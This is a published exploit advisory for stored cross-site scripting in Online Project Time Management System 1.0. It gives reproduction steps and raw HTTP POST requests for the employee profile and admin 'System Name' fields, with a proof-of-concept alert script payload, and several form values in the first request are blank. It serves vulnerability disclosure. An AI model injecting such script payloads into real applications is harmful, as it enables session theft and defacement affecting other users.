Online Project Time Management System 1.0 – Multiple Stored Cross Site Scripting (XSS) (Authenticated)

  • 作者: Felipe Alcantara
    日期: 2022-01-25
  • 类别:
  • 来源:
  • # Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)
    # Date: 19/01/2022
    # Exploit Author: Felipe Alcantara (Filiplain)
    # Vendor Homepage:
    # Software Link:
    # Version: 1.0
    # Tested on: Kali Linux
    # Description: Stored XSS in multiple fields...
    # Steps to reproduce (with employee Access)
    # Log in as an employee
    # Go to : http://localhost/ptms/?page=user
    # Add XSS payload to any field of the user's name.
    #Click Update
    POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
    Host: localhost
    Content-Length: 1339
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak
    Origin: http://localhost
    Referer: http://localhost/ptms/?page=user
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
    Connection: close
    Content-Disposition: form-data; name="id"
    Content-Disposition: form-data; name="code"
    Content-Disposition: form-data; name="generated_password"
    Content-Disposition: form-data; name="firstname"
    Content-Disposition: form-data; name="middlename"
    Content-Disposition: form-data; name="lastname"
    Content-Disposition: form-data; name="gender"
    Content-Disposition: form-data; name="department"
    IT Department
    Content-Disposition: form-data; name="position"
    Department Manager
    Content-Disposition: form-data; name="email"
    Content-Disposition: form-data; name="password"
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    # Steps to reproduce (with Admin access)
    # Log in to the admin panel
    # Go to : http://localhost/ptms/admin/?page=system_info
    # Add XSS payload to the 'System Name' field
    #Click Update
    POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1
    Host: localhost
    Content-Length: 603
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq
    Origin: http://localhost
    Referer: http://localhost/ptms/admin/?page=system_info
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
    Connection: close
    Content-Disposition: form-data; name="name"
    Online Project Time Management System - PHP <script>alert("XSS")</script>
    Content-Disposition: form-data; name="short_name"
    PTMS - PHP
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    Content-Disposition: form-data; name="cover"; filename=""
    Content-Type: application/octet-stream